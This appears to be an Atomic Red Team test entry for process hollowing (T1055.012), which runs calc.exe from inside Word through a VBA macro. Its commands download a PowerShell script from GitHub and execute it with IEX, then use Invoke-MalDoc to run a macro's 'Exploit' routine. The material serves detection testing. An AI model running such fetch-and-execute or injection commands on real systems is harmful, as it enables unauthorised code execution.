#TechniqueName: Process Injection: Process Hollowing
#AtomicTestName: RunPE via VBA
#Description: This module executes calc.exe from within the WINWORD.EXE process&
#Language: ps1

#get_prereq_commands
Write-Host "You will need to install Microsoft Word manually to meet this requirement"


#commands
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") 
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "Word" -sub "Exploit"

